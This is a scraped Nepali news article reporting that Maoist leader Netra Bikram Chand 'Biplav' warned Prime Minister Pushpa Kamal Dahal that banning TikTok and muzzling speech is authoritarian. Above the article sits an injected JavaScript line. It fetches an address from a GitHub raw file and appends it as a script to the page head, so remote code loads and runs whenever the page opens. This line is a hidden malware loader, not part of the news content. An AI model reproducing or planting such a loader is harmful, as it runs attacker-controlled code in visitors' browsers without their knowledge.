;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ
नेपाल कम्युनिष्ट पार्टीका महासचिव नेत्रविक्रम चन्द ‘विप्लव’ले जनताको मुख थुनेर सत्ता टिक्दैन भन्दै ‘प्रचण्ड’लाई चेतावनी दिएका छन्।
‘फेसबुक बन्द गर्ने, लेख्न नदिने, पत्रिका बन्द गर्ने त निरंकुश व्यवस्थाको चरित्र हो। हिजो पेपर बन्द गरिदिएको जस्तो । पञ्चायतले आफूले भनेअनुसार लेख, नत्र पाइँदैन भनेजस्तो भयो,’ उनले भने, ‘मुख बन्द गरेर होइन जनताको मन जित्नु पर्छ |
शनिबार काठमाडौंमा आयोजित एक कार्यक्रमलाई सम्बोधन महासचिव विप्लवले सरकारले टिकटक प्रतिवन्ध लगाएको विषयबारे बोल्दै सामाजिक सञ्जालमा प्रतिबन्ध लगाएर सत्ता टिकिरहन्छ भन्ने नठान्न प्रधानमन्त्री पुष्पकमल दाहाललाई चेतावनी दिएका हुन्।
उनले सामाजिक सञ्जालको प्रतिवन्ध निरंकुश व्यवस्थाको चरित्र भएको बताए। उनले सत्ता जनताको मुख बन्द गरेर नभइ जनताको मन जितेर मात्रै टिक्ने बताए । उहाँले जनताको मुख थुनेर शासन चलाउँछु भन्नेहरुको चाँडै अन्त्य हुने बताए।
फेसबुक प्रतिक्रियाहरु